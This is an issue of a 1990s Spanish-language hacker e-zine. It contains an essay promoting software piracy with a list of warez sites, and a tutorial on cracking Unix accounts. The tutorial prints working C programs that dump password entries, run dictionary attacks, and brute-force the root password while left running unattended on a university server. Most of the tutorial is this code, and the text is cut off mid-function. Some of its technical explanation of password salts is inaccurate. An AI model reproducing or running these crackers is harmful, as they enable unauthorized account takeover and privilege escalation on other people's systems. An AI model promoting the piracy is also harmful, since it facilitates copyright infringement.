RareGaZz8:(RARE008.TXT):12/12/1999 << Back To RareGaZz8

═1/septiembre/1997════════════════════════════════════════════════════════════ ─────────────────────────────────────────────── <<::RareGaZz::>>══════════════ ────────────────────────────────────────────────── "Mex & Co."════════════════ ─── En este numero:═══════════════════════════════════════════════════════════ ────────────────────────────────────────────────────────────────────────────── ───────── 1.WareZ World═══════════════════════════════════════════════════════ ────────── 2.Cracking cualquier sistema UNIX══════════════════════════════════ ─────────── 3.Como destruir a la competencia══════════════════════════════════ ──────────── 4.Los secretos del Carding!══════════════════════════════════════ ───────────── 5.Phreaking & Hacking═══════════════════════════════════════════ ────────────── 6.Los Hackers de las Macintosh═════════════════════════════════ ─────────────── 7.Los malos de CYBERsitter════════════════════════════════════ ──────────────── 8.Surfeo de Puertos══════════════════════════════════════════ ───────────────── 9.Denial of Service -una introduccion-══════════════════════ ────────────────── 10.L3TZ HACK! "Low Fat"════════════════════════════════════ ─────────────────── 11.B00/\/\3R4/\/G═════════════════════════════════════════ ──────────────────── 12.NotiLOONS═════════════════════════════════════════════ ══════════════════════════════════════════════════════════════════════════════ ────────── La Informacion que en este numero aparece *puede* servir═══════════ ────────── para causar daño a una compañia o sistema y nadie de los═══════════ ────────── que colaboran y/o editan esta revista debe ser señalado═══════════ ────────── como responsable. No respondemos chipote con sangre... ═══════════ ══════════════════════════════════════════════════════════════════════════════ ────────────────────────────────────────────────────────────── Design: Swoish═ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Mr.X - RareTrip - ServerHacker - GuyBrush - Azumlord - LePompeItor - KillerBot CrackSmoker - Swoish - Groovy - Nopal Picudo =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- * http://www.geocities.com/Baja/4426 * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Para contactar a RareGaZz via email: RAREGAZZ@BIGFOOT.COM opcionalmente y dependiendo del mensaje puedes encriptarlo con esta llave -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3 mQENAzPMAlMAAAEIAMZQzI19DkA4QyK80OIExuCrZhp840Qn33nMC1laDoMAFPdU M/eXfxWnGb5cl0JX4UsmqYhH06w6Eh7LKN3M8uihxl7grSqyrK0kWheDpCS2gTCV qoD8FM5sjQon/vDtc0rMy3qm9JUSKEEiN9NiAlT4Ppa5Ms5rFxT8VAxRJ6PYuh99 3jvDGhjMmKsNatv3UKiNiztfOtfP+FzO/NouPpUh38q2/OryHIgBsoGSIKJjWwHw jhsj0PHl2cHoRsYWJhFCfAHFcQ29jiU17JFItxvZ8klEgPS/jRphpi93ICJ1pWq7 2TSZ2Y+fH4LBlRgGZ/pmkrtAahP7rjA7ZhGTxN0ABRG0KVJhcmVHYVp6IDIwNDgg Qml0cyA8UkFSRUdBWlpAQklHRk9PVC5DT00+ =e/tl -----END PGP PUBLIC KEY BLOCK----- " ¡¡¡ Viva Mejicouu !!! " -Inversionista Extranjero " Whats the buzz? tell what's happening " -Jesucristo super estrella " Ella se estrello con el, en una exposicion de arte. Por el golpe, su celular se estropeo. Se enamoraron y se fueron a vivir juntos. Pero el jamas le perdono que ella precisamente le hubiera dañado su telefono. Nunca se lo perdono. Ni hoy, que vive solo. http://members..tripod.com/~fab/fab " [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ INTRO - INTRO - INTRO - INTRO - INTRO - INTRO ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] Joh, Joh, Joh - Es navidad de nuevo en internet y este año te amanecio otro nuevo numero de RareGaZz bajo tu webpage favorita. Seguramente te habras portado excelente como para estar leyendo este zine desde el comfort de tu computadora en cualquier parte del mundo. Muchas cosas nuevas por 'aca en el Polo Norte venados vienen y venados van pero el trineo sigue jalando para repartir juguetes a todos los aficionados al hacking y otras terminantes en "king" como Phreaking & Cracking que hablan o entienden el lenguaje preferido de los dioses ... español. Desesperado por que santa no llega? Pues dirigite a su escondite secreto en www.geocities.com/Baja/4426 para ver a los duendes trabajar consiguiendo software y links nuevos para tu placer y satisfaccion personal. Bueno es hora de abrir el viejo saco de sorpresas y poner a tu disposicion todo el contenido para tu deleite intelectual y emocional. Recuerda que si te portas bien pronto habra regalos de nuevo. Portate mal y tendras que esperar otro mes para que santa te visite de nuevo :-) Santa Claus alias raretrip. @@@@@@@@@@@@@@@@@@@@@@@@@@@ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ Este texto debera ser leido usando un editor MSDOS ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] = WareZ World = por KillerBot para RareGaZz Quizas algunos no saben lo que es o significa el warez ni sus principios o razon de existir, aunque estoy familiarizado con algunos grupos de warez no por que escriba este texto quiero decir que se todo sobre este modo de vida. Simplemente es mi opinion personal y asi debe ser tomada. El warez existe desde los principios de la informatica actual cuando empezaron a aparecer productos de software que se comercializaban para generar ingresos economicos a una persona o compañia. El boom o lo que desato al mundo warez fueron las BBS a principios del año 1985 con velocidades maximas de 2400bps la mayoria pero tambien existian pocas (por el carding) con soporte hasta de 9600bps. La velocidad de aquel entonces era suficiente, aun no existian los programas de seis u ocho megas que existen ahora. Basicamente el "warez" era codigo fuente de Cobol, Basic y pequeños programas compilados de 300k a 500k Con el avance de las computadoras y el desarrollo rapido de la industria del software se necesitaba una ley que prohibiera el copiado y distribucion de codigo fuente o compilado para proteger los derechos de autor o los ingresos de la compañia. Aqui en Mexico esta ley se creo y se hecho a funcionar hace poco tiempo pero en los estados unidos fue aprox. en 1987 cuando la ley entro en vigor. Esto solo significo una cosa: lo que haciamos en las BBS como "El escondite de BatMan" y "El agujero negro" en El paso Texas se convirtio en algo ilegal. Pronto desaparecieron estas BBS con cargos legales en su contra y la confiscacion del equipo. Los SysOps de estas bbs y los que ayudabamos a mantenerla con el mejor software que habia eramos apenas chicos de 16 a 17 años...era 1988...en Texas. Un poco asustado yo me retire del mundo warez al ver como mis mejores amigos y los sysops de las bbs que frecuentaba eran sometidos a penas como servicio social y multas. Se hablaba de que el mundo warez jamas volveria a surgir. Sabiamos que era el fin, el grand finale del imperio que formaron las bbs contra compañias transnacionales. Es verdad que el mundo warez aqui permanecio callado como 2 o 3 años, el unico intercambio de software pirata era con conocidos y por medio de diskettes y eso disminuia gracias a la cobertura amarillista de la prensa en esos años sobre los virus informaticos. Muchos de nosotros tuvimos que caer en el infortunio de ir a una tienda de software a comprar, repito, comprar! software a pesar de habernos mal acostumbrado por tantos años... Internet Tenia 18 años cuando escuche y comprendi esa palabra por la boca de un profesor de mi prepa ya en Mexico. Por suerte conocia a un compañero que tenia un login y password en el sistema internet de una escuela de ingenieria y empezamos a ver que hacia X comando y luego este otro hasta que pude ver en UNIX el regreso del mundo warez que ya casi habia olvidado a pesar de que en El Paso seguian los arrestos. Con Internet y UNIX llego FTP y esa herramienta fue el resurgimiento del mundo warez mundial ya no solamente local como lo fueron las BBS. Era la oportunidad para el mundo warez de surgir mundialmente y no pensabamos dejarla pasar. ¿ What's wrong with Warez ? Que hay de malo con el warez? NADA. Absolutamente nada, es mas creo que es un servicio a la comunidad de estudiantes del mundo entero. Si eres un profesional que usas un programa warez para ganar dinero...pudrete en el infierno. El mayor logro del warez es brindar las herramientas necesarias para un buen trabajo universitario [ o de cualquier nivel ] a personas sin los ingresos necesarios para comprar 9 diskettes a 200 dolares! El warez d00d tambien debe tener valores. No podria yo distribuir un programa que vale el dinero que cuesta por que entonces estaria haciendo algo lame. Pero ¿ como saber si el software vale lo que pide ? Simple, si el programa lo escribio una compañia grande como Oracle o Microsoft entonces copy tha' motha fucker! pero si el programa fue el esfuerzo de un programador y pide de 20 a 25 dolares por el entonces por que esforzarnos en copiarlo? Una copia original de un programa deberia costar entre 10 y 15 dolares por persona pero el costo de distribucion, paqueteria y demas aumenta el precio unos 10 dolares mas pero no 50! Los mejores programadores han dado su software GRATIS solo vean a Mosaic el primer navegador de la red 100% gratuito, pero llego Netscape y Microsoft y comenzo la carrera capitalista. Tengo entendido que el Microsoft Office 97 ya esta en algunos ftp's en internet. Magnifico. Seguramente ayudara a muchas personas con su trabajo sin vaciarles el bolsillo. Esta es mi vision de los programas "piratas" que son la oveja negra y descarriada del Tio Sam y Mr.Gates. Si no les gustaria ver su programa accesible a cualquier persona en un ftp anonimo la solucion no es un virus, tampoco candados o claves (para eso hay crackers), la unica solucion permanente y efectiva es hacer FREEWARE! Sitios donde puedes conseguir WareZ (hot spots): Los mejores 50 sitios WareZ http://www.absoluteaccess.com/wareznet/index.htm Express's WareZ Main Page http://www.icwater.com/express/main.htm Rastastugan Password Appz: need http://hem2.passagen.se/joppe666/INDE.HTM -Norton antivirus -Kais PowerGoo -Kais Powertools -y 256 programas mas! Lamer''S WareZ Direct Download http://pages.infinit.net/atix/lame/apps.htm Por FTP: 148.202.33.10 - Universidad de Guadalajara /pub/incoming -Norton Utilities ( 7 discos ) -Mucho Warez! [ En el sitio FTP de la universidad de G. tambien encontraran un directorio con la letra de las canciones de sus grupos favoritos. Tengo que decirles que quede muy impresionado cuando encontre la letra de todos los albums que ha lanzado PIXIES asi como NIRVANA. No se pierdan la oportunidad de tener la letra de sus canciones favoritas y visiten el directorio: /pub/canciones/letras y si quieren la letra de Nirvana /pub/canciones/letras/n/nirvana o la de Pixies /pub/canciones/letras/p/pixies Tambien hay sitios donde pueden conseguir la musica en formato .au uno de estos es: http://alpes.eurecom.fr/~egal/songs/ Si quieren checar calidad: http://alpes.eurecom.fr/~egal/songs/Pixies/ para descomprimir los archivos necesitaran www.winzip.com y para escuchar la musica algun buen editor de archivos (.au) como Cool Edit para aumentar la calidad del archivo a estereo y reducir la cantidad de ruido. ] [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ Se egoista y comparte tus textos unicamente con RareGaZz ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ┌───────────────────────────────────────────────────────────────────────────┐ │ COMO CRACKER CUALQUIER SISTEMA BASADO EN UNIX │ │ (Conceptos basicos) │ ├───────────────────────────────────────────────────────────────────────────┤ │ Por: Guybrush │ ├───────────────────────────────────────────────────────────────────────────┤ │ E-Mail: guybrush@axis.org │ └───────────────────────────────────────────────────────────────────────────┘ ┌───────────────────────────────────────────────────────────────────────────┐ │ INDICE │ └───────────────────────────────────────────────────────────────────────────┘ 0-Introduccion 1-¿Porque es importante conocer el Unix? 2-¿Porque es facil cracker un sistema Unix? 3-Capturando el fichero passwd 3.1-Unix 3.2-Otros sistemas derivados 4-¿Es posible desencriptar un password? 5-¿Para que sirven los famosos 'diccionarios'? 6-Como averiguar password con diccionarios 6.1-Un programa ejemplo 6.2-Generadores de palabras 7-Cuentas Unix por defecto 8-Despedida ┌───────────────────────────────────────────────────────────────────────────┐ │ 0-INTRODUCCION │ └───────────────────────────────────────────────────────────────────────────┘ No voy a contaros toda la historia del Unix ya que ademas de ser aburrida, imagino que estareis hartos de leerla. Simplemente quiero decir que este es un documento bastante basico sobre seguridad en Unix, pero que viene muy bien sobre todo a la gente que estudia o trabaja en alguna Universidad o cualquier otro centro y tiene acceso a un shell del servidor. Tambien me gustaria que si alguien tiene dudas sobre lo que aqui escribo, o cualquier otra cosa, me mande un e-mail. ┌───────────────────────────────────────────────────────────────────────────┐ │ 1-¿POR QUE ES IMPORTANTE CONOCER UNIX? │ └───────────────────────────────────────────────────────────────────────────┘ Unix es un sistema operativo multitarea y multiusuario, y que ademas, lleva muchos años funcionando como tal. Aunque con la aparicion del Windows NT (aparentemente bastante seguro, aunque con muchos bugs :) - pero eso es otro tema) este decreciendo el numero de empresas que usan Unix, sigue siendo hoy en dia uno de los sistemas operativo mas 'seguros' que existen. Por lo que muchisimas empresas (y sobre todo Universidades) lo usan. Ademas es mas facil hackear desde un sistema Unix que desde Windows. ¿Como podemos nosotros hackear desde un Unix (o derivado de el)? Debemos disponer de una cuenta shell (que nos la debe de dar nuestro proveedor de Internet) o bien accediendo a Internet mediante Linux. Pero esto lo veremos en otras revistas. ┌───────────────────────────────────────────────────────────────────────────┐ │ 2-¿POR QUE ES FACIL CRACKEAR UN SISTEMA UNIX? │ └───────────────────────────────────────────────────────────────────────────┘ Los que inventaron Unix crearon un sistema bastante seguro, pero no perfecto. Todos los sistemas tienen bugs, y a pesar de que en cada nueva version hay menos agujeros, sigue siendo imperfecto. Hay algunos 'fallos' en el diseño del sistema que un programador muy experimentado podria aprovechar. Por ejemplo: un usuario no puede crear un directorio. No tiene poermiso para ello. Por lo que cuando hacemos un mkdir, le pasamos el control (por milesimas de segundo) a root, que es el que se encarga de crearlo y luego devolvernos el control. ¡¡Imagina lo que ocurriria si fueramos capaces de causar una inte- rrupcion en ese pequeño tiempo en que root tiene el control!! Automaticamente pasariamos a ser los dueños y señores del sistema. (lo siento Rabine, no me he podido resistir) :) Pero yo no voy a enseñar ningun bug, ni tampoco programacion avanzada. Solo voy a mostrar una forma muy simple de conseguir cuentas. Y si el administrador es un poco lamer incluso podremos ser root. El sistema Unix tiene un metodo de cifrado muy bueno, pero guarda la informa- cion de todos los usuario junto con sus password (logicamente cifrados) en un fichero. El fichero passwd. ┌───────────────────────────────────────────────────────────────────────────┐ │ 3-CAPTURANDO EL FICHERO PASSWD │ └───────────────────────────────────────────────────────────────────────────┘ ┌────────┐ │3.1-UNIX│ └────────┘ En Unix es muy sencillo leer este fichero, ya que es accesible a cualquier usuario. Se encuentra en el directorio /etc. Y tiene la siguiente forma: paco:ZbkEM2vQVowcw:10013:202:PACO SANCHEZ PENADES:/home/paco:/bin/ksh elisa:GeJuwMrBVa6mg:10016:202:ELISA J. CRIVILLES:/home/elisa:/bin/ksh pepe:GezuA6krN/BsE:10019:202:PEPE PEÑALVER BENAVENT:/home/pepe:/bin/ksh juan:Ge7EPYLjRYX9I:10022:202:JUAN BELLIDO IBORRA:/home/juan:/bin/ksh ¿Que significa todo esto? Veamos. el fichero contiene estos datos: 1:2:3:4:5:6:7 donde: 1) nombre del usuario 2) password encriptado 3) numero UID (identificacion de usuario) 4) numero GID (identificacion de grupo) 5) datos del usuario 6) directorio de trabajo 7) directorio del shell ┌────────────────────────────┐ │3.2-OTROS SISTEMAS DERIVADOS│ └────────────────────────────┘ No todos los sistemas guardan el fichero passwd en /etc. He aqui una lista de varios sistemas y sus directorios: AIX 3 /etc/security/passwd A/UX 3.0s /tcb/files/auth/? BSD4.3-Reno /etc/master.passwd ConvexOS 10 /etc/shadpw ConvexOS 11 /etc/shadow DG/UX /etc/tcb/aa/user/ EP/IX /etc/shadow HP-UX /.secure/etc/passwd IRIX 5 /etc/shadow Linux 1.1 /etc/shadow OSF/1 /etc/passwd[.dir|.pag] SCO Unix #.2.x /tcb/auth/files/<first letter SunOS4.1+c2 /etc/security/passwd.adjunct SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] UNICOS /etc/udb (lista sacada de los FAQ de alt.2600) En muchos de estos sistemas, el directorio que contiene el fichero passwd no es de acceso a usuarios que no sean root, por lo que no podemos ver el conte- nido del directorio. Pero esto no es ningun impedimento para nosotros. Aqui posteo un pequeño programa con el que reconstruimos el fichero passwd, a pesar de que no podamos acceder a el: ------------------------ cortar por aqui ------------------------------------- // Programa que reconstruye el fichero passwd. // Copyright (c) Guybrush // Compilar en c++ y redireccionar la salida a un fichero // cc cogerPass.cc -o cogerPass > fichero #include <iostream.h> #include <pwd.h> struct passwd *pw; main() { while ((pw = getpwent()) != NULL) { cout << pw->pw_name; cout << ":" << pw->pw_passwd; cout << ":" << pw->pw_uid; cout << ":" << pw->pw_gid; cout << ":" << pw->pw_gecos; cout << ":" << pw->pw_dir; cout << ":" << pw->pw_shell << endl; } endpwent(); } ------------------------ cortar por aqui ------------------------------------- ┌───────────────────────────────────────────────────────────────────────────┐ │ 4-¿ES POSIBLE DESENCRIPTAR UN PASSWORD? │ └───────────────────────────────────────────────────────────────────────────┘ Ningun cifrado es indescrifrable, pero hay algunos que con los ordenadores de hoy en dia se tardarian muchos años en poder descifrar, como es el caso del cifrado de Unix. Cuando creamos un password, Unix aplica sobre el el algoritmo de cifrado lla- mado DES, el cual era un algoritmo practicamente indescifrable cuando se ideo, pero que con el paso del tiempo y la tremenda evolucion de la tecnologia, cada dia se hace mas posible su desencriptado, dada la velocidad de los ordenadores actuales. Pero la cosa no es tan facil ya que Unix no aplica este algoritmo una sola vez, sino que lo aplica 25 veces. Una vez que encripta la palabra, la vuelve a encriptar, y asi sucesivamente, hasta 25. Y por si fuera poco, a la palabra resultante le añade dos caracteres mas, llamados 'salt', que provienen de la hora de encriptado. Es decir, si nosotros encriptamos la palabra 'pepe' a las 20:00 y la volvemos a encriptar a las 20:05 (por ejemplo), la palabra cifrada resultante no es la misma. Cada palabra tiene ¡¡4.096 formas distintas!! de desencriptarse. Por lo que si has pensado alguna vez en descifrar una palabra ... ni lo sueñes (por lo menos con los ordenadores de hoy en dia). Es practicamente imposible (se tar- daria una eternidad). Por eso recurrimos a los diccionarios... ┌───────────────────────────────────────────────────────────────────────────┐ │ 5-¿PARA QUE SIRVEN LOS FAMOSOS DICCIONARIOS? │ └───────────────────────────────────────────────────────────────────────────┘ Como hemos visto, no podemos descifrar un password, pero si que podemos cifrar palabras con todos los salt posibles y compararlas con la que ya tenemos ci- frada. Por ejemplo, ciframos la palabra 'arbol', le quitamos el salt y le aña- dimos todas las combinaciones. Luego las comparamos con el password ya cifrado y si son iguales ... ¡ya tenemos la clave!. Pero tampoco es cuestion de comen- zar a introducir palabras por teclado ya que se nos haria eterno y muy engo- rroso, por lo que primero podemos construir un diccionario (hay muchos en Internet), el cual le pasaremos como parametro al programa comparador que ten- gamos. Y el se encargara de realizar todo el trabajo. ┌───────────────────────────────────────────────────────────────────────────┐ │ 6-¿COMO AVERIGUAR PASSWORD CON DICCIONARIOS? │ └───────────────────────────────────────────────────────────────────────────┘ ┌───────────────────────┐ │6.1-UN PROGRAMA EJEMPLO│ └───────────────────────┘ He aqui un pequeño programa que encripta y comprara palabras. Es de lo mas basico, por lo que no deberias tener ningun problema en entenderlo. Tambien existen otros que funcionan bajo DOS y que funcionan mas rapido como son: brute, jack crack, john the ripper, ... Te recomiendo que los consigas. este programa comprueba que el usuario exista en esa maquina y captura el mismo la palabra encriptada. Si quieres puedes modificarlo para que le puedas pasar como parametro la palabra encriptada y que trabaje en tu misma casa. Tambien acepta cualquier texto ya que el mismo se encarga de deshechar los caracteres especiales: ------------------------ cortar por aqui ------------------------------------- // Programa que lee palabras de cualquier diccionario o texto y despues de // encriptarlas las compara. // Copyright (c) Guybrush #include <stdio.h> #include <pwd.h> char cadena[30]; char clave[30]; struct passwd *pwd; int desencripta(char *clave, char *archivo) { FILE *fichero; char *crypt(), *resp; int cont; if ((fichero = fopen(archivo,"r")) == NULL) { printf("\nError al abrir diccionario\n"); exit(0); } while (!feof(fichero)) { cont = 0; do { cadena[cont] = fgetc(fichero); cont++; } while ((cadena[cont-1] != '\n') && (cadena[cont-1] != ' ') && (cadena[cont-1] != ',') && (cadena[cont-1] != '.') && (cadena[cont-1] != ';') && (cadena[cont-1] != ':') && (!feof(fichero))); cadena[cont-1] = '\x0'; resp = crypt(cadena,clave); if (!strcmp(resp,clave)) { printf("\a\n\n\n ==> El password es : %s <==\n\n\n",cadena); fclose(fichero); return 1; } } fclose(fichero); return 0; } main(int argc, char **argv) { int respuesta; char clave[15]; if (argc == 3) { if (!(pwd = getpwnam(argv[1]))) { printf("\nUsuario desconocido.\n\n"); exit(-1); } strcpy(clave,pwd->pw_passwd); endpwent(); printf("\n\nBuscando palabras en el diccionario ...\n\n"); respuesta = desencripta(clave,argv[2]); if (respuesta != 1) printf("\n\n\nPalabra no encontrada en el diccionario.\n\n\n"); } else printf("\n\nUsar: %s <usuario> <diccionario donde buscar>\n\n",argv[0]); } ------------------------ cortar por aqui ------------------------------------- ┌───────────────────────────┐ │6.2-GENERADORES DE PALABRAS│ └───────────────────────────┘ Podemos diseñar tambien un programa que genere todas las combinaciones de palabras y/o numeros. Esto es muy util para password con menos de 6 caracteres ya que con 5 ya tarda una eternidad. Ademas hemos de tener en cuenta que un password admite mayusculas, numeros y caracteres especiales. He aqui un pequeño programa el cual uso para dejar residente en la Universidad ya que esta esta en funcionamiento las 24 horas del dia. Aunque tarde semanas o meses en encontrar el password, como no esta en mi casa ... :) ------------------------ cortar por aqui ------------------------------------- // Programa que debemos dejar residente con 'nohup' y que busca todas las // posibles combinaciones para desencriptar un password. Tambien controla // las interrupciones y hace copias de seguridad ante un kill y cada cierto // tiempo para poder continuar posteriormente por donde se quedo. // Copyright (c) Guybrush #include <stdio.h> #include <string.h> #include <pwd.h> #include <signal.h> #include <sys/types.h> #define USUARIO "root" // nombre del usuario #define DATOS "datos" // fichero temporal donde guarda datos ante un kill #define SALIDA "salida" // donde graba el password en caso de encontrarlo /*#define CADENA "abcdefghijklmnñopqrstuvwxyz"*/ #define CADENA "abcdefghijklmnñopqrstuvwxyz0123456789" /*#define CADENA "abcdefghijklmnñopqrstuvwxyzABCDEFGHIJKLMNÑOPQRSTUVWXYZ"*/ /*#define CADENA "abcdefghijklmnñopqrstuvwxyzABCDEFGHIJKLMNÑOPQRSTUVW XYZ0123456789-"*/ struct { char c1[2]; char c2[3]; char c3[4]; char c4[5]; char c5[6]; char c6[7]; char c7[8]; char c8[9]; } proceso; struct passwd *pwd; FILE *fichero; double contador = 0; main() { void inicializar(); void abandonar(); void uno(), dos(), tres(), cuatro(), cinco(), seis(), siete(), ocho(); char cadena[30]; int longitud = strlen(CADENA); char clave[15]; signal(SIGTERM,abandonar); if (!(pwd = getpwnam(USUARIO))) { printf("\nUsuario desconocido.\n\n"); exit(-1); } strcpy(clave,pwd->pw_passwd); endpwent(); strcpy(cadena,CADENA); inicializar(cadena); uno(longitud, cadena, clave); dos(longitud, cadena, clave); tres(longitud, cadena, clave); cuatro(longitud, cadena, clave); cinco(longitud, cadena, clave); seis(longitud, cadena, clave); siete(longitud, cadena, clave); ocho(longitud, cadena, clave); abandonar(); } void inicializar(char *cadena) { int cont; if ((fichero = fopen(DATOS,"r")) != NULL) { fread(&proceso,sizeof(proceso),1,fichero); fclose(fichero); } else { if ((fichero = fopen(DATOS,"w")) == NULL) { printf("\nError al crear fichero.\n\n"); exit(-1); } proceso.c1[0] = cadena[0]; for (cont = 0; cont < 2; cont++) proceso.c2[cont] = cadena[0]; for (cont = 0; cont < 3; cont++) proceso.c3[cont] = cadena[0]; for (cont = 0; cont < 4; cont++) proceso.c4[cont] = cadena[0]; for (cont = 0; cont < 5; cont++) proceso.c5[cont] = cadena[0]; for (cont = 0; cont < 6; cont++) proceso.c6[cont] = cadena[0]; for (cont = 0; cont < 7; cont++) proceso.c7[cont] = cadena[0]; for (cont = 0; cont < 8; cont++) proceso.c8[cont] = cadena[0]; proceso.c1[1] = '\n'; proceso.c2[2] = '\n'; proceso.c3[3] = '\n'; proceso.c4[4] = '\n'; proceso.c5[5] = '\n'; proceso.c6[6] = '\n'; proceso.c7[7] = '\n'; proceso.c8[8] = '\n'; fwrite(&proceso,sizeof(proceso),1,fichero); fclose(fichero); } proceso.c1[1] = '\x0'; proceso.c2[2] = '\x0'; proceso.c3[3] = '\x0'; proceso.c4[4] = '\x0'; proceso.c5[5] = '\x0'; proceso.c6[6] = '\x0'; proceso.c7[7] = '\x0'; proceso.c8[8] = '\x0'; return; } void abandonar() { if ((fichero = fopen(DATOS,"w")) == NULL) { printf("\nError al crear fichero.\n\n"); exit(-1); } proceso.c1[1] = '\n'; proceso.c2[2] = '\n'; proceso.c3[3] = '\n'; proceso.c4[4] = '\n'; proceso.c5[5] = '\n'; proceso.c6[6] = '\n'; proceso.c7[7] = '\n'; proceso.c8[8] = '\n'; fwrite(&proceso,sizeof(proceso),1,fichero); fclose(fichero); exit(-1); } void copia() { if ((fichero = fopen(DATOS,"w")) == NULL) { printf("\nError al crear fichero.\n\n"); exit(-1); } proceso.c1[1] = '\n'; proceso.c2[2] = '\n'; proceso.c3[3] = '\n'; proceso.c4[4] = '\n'; proceso.c5[5] = '\n'; proceso.c6[6] = '\n'; proceso.c7[7] = '\n'; proceso.c8[8] = '\n'; fwrite(&proceso,sizeof(proceso),1,fichero); fclose(fichero); return; } int busca(int longitud, char *cadena, char caracter) { int posicion; for (posicion = 0; posicion < longitud; posicion++) if (caracter == cadena[posicion]) return posicion; return 0; } void encontrado(char *palabra) { FILE *fichero2; printf("\a\a\a"); if ((fichero2 = fopen(SALIDA,"w")) == NULL) { printf("\nError al crear fichero.\n\nClave : %s",palabra); exit(-1); } fprintf(fichero2,palabra); fclose(fichero2); return; } void uno(int longitud, char *cadena, char *clave) { void encontrado(); void copia(); char *crypt(), *desencripta; int cont; int p0 = busca(longitud,cadena,proceso.c1[0]); for (cont = p0; cont != longitud; cont++) { proceso.c1[0] = cadena[cont]; desencripta = crypt(proceso.c1,clave); if (!strcmp(desencripta,clave)) { encontrado(proceso.c1); abandonar(); } if ((contador++) == 60000) { copia(); contador = 0; } } return; } void dos(int longitud, char *cadena, char *clave) { void encontrado(); void copia(); char *crypt(), *desencripta; int cont, cont2; int p0 = busca(longitud,cadena,proceso.c2[0]); int p1 = busca(longitud,cadena,proceso.c2[1]); for (cont = p0; cont < longitud; cont++) { proceso.c2[0] = cadena[cont]; for (cont2 = p1; cont2 < longitud; cont2++) { proceso.c2[1] = cadena[cont2]; desencripta = crypt(proceso.c2,clave); if (!strcmp(desencripta,clave)) { encontrado(proceso.c2); abandonar(); } if ((contador++) == 60000) { copia(); contador = 0; } } p1 = 0; } return; } void tres(int longitud, char *cadena, char *clave) { void encontrado(); void copia(); char *crypt(), *desencripta; int cont, cont2, cont3; int p0 = busca(longitud,cadena,proceso.c3[0]); int p1 = busca(longitud,cadena,proceso.c3[1]); int p2 = busca(longitud,cadena,proceso.c3[2]); for (cont = p0; cont < longitud; cont++) { proceso.c3[0] = cadena[cont]; for (cont2 = p1; cont2 < longitud; cont2++) { proceso.c3[1] = cadena[cont2]; for (cont3 = p2; cont3 < longitud; cont3++) { proceso.c3[2] = cadena[cont3]; desencripta = crypt(proceso.c3,clave); if (!strcmp(desencripta,clave)) { encontrado(proceso.c3); abandonar(); } if ((contador++) == 60000) { copia(); contador = 0; } } p2 = 0; } p1 = 0; } return; } void cuatro(int longitud, char *cadena, char *clave) { void encontrado(); void copia(); char *crypt(), *desencripta; int cont, cont2, cont3, cont4; int p0 = busca(longitud,cadena,proceso.c4[0]); int p1 = busca(longitud,cadena,proceso.c4[1]); int p2 = busca(longitud,cadena,proceso.c4[2]); int p3 = busca(longitud,cadena,proceso.c4[3]); for (cont = p0; cont < longitud; cont++) { proceso.c4[0] = cadena[cont]; for (cont2 = p1; cont2 < longitud; cont2++) { proceso.c4[1] = cadena[cont2]; for (cont3 = p2; cont3 < longitud; cont3++) { proceso.c4[2] = cadena[cont3]; for (cont4 = p3; cont4 < longitud; cont4++) { proceso.c4[3] = cadena[cont4]; desencripta = crypt(proceso.c4,clave); if (!strcmp(desencripta,clave)) { encontrado(proceso.c4); abandonar(); } if ((contador++) == 60000) { copia(); contador = 0; } } p3 = 0; } p2 = 0; } p1 = 0; } return; } void cinco(int longitud, char *cadena, char *clave) { void encontrado(); void copia(); char *crypt(), *desencripta; int cont, cont2, cont3, cont4, cont5; int p0 = busca(longitud,cadena,proceso.c5[0]); int p1 = busca(longitud,cadena,proceso.c5[1]); int p2 = busca(longitud,cadena,proceso.c5[2]); int p3 = busca(longitud,cadena,proceso.c5[3]); int p4 = busca(longitud,cadena,proceso.c5[4]); for (cont = p0; cont < longitud; cont++) { proceso.c5[0] = cadena[cont]; for (cont2 = p1; cont2 < longitud; cont2++) { proceso.c5[1] = cadena[cont2]; for (cont3 = p2; cont3 < longitud; cont3++) { proceso.c5[2] = cadena[cont3]; for (cont4 = p3; cont4 < longitud; cont4++) { proceso.c5[3] = cadena[cont4]; for (cont5 = p4; cont5 < longitud; cont5++) { proceso.c5[4] = cadena[cont5]; desencripta = crypt(proceso.c5,clave); if (!strcmp(desencripta,clave)) { encontrado(proceso.c5); abandonar(); } if ((contador++) == 60000) { copia(); contador = 0; } } p4 = 0; } p3 = 0; } p2 = 0; } p1 = 0; } return; } void seis(int longitud, char *cadena, char *clave) { void encontrado(); void copia(); char *crypt(), *desencripta; int cont, cont2, cont3, cont4, cont5, cont6; int p0 = busca(longitud,cadena,proceso.c6[0]); int p1 = busca(longitud,cadena,proceso.c6[1]); int p2 = busca(longitud,cadena,proceso.c6[2]); int p3 = busca(longitud,cadena,proceso.c6[3]); int p4 = busca(longitud,cadena,proceso.c6[4]); int p5 = busca(longitud,cadena,proceso.c6[5]); for (cont = p0; cont < longitud; cont++) { proceso.c6[0] = cadena[cont]; for (cont2 = p1; cont2 < longitud; cont2++) { proceso.c6[1] = cadena[cont2]; for (cont3 = p2; cont3 < longitud; cont3++) { proceso.c6[2] = cadena[cont3]; for 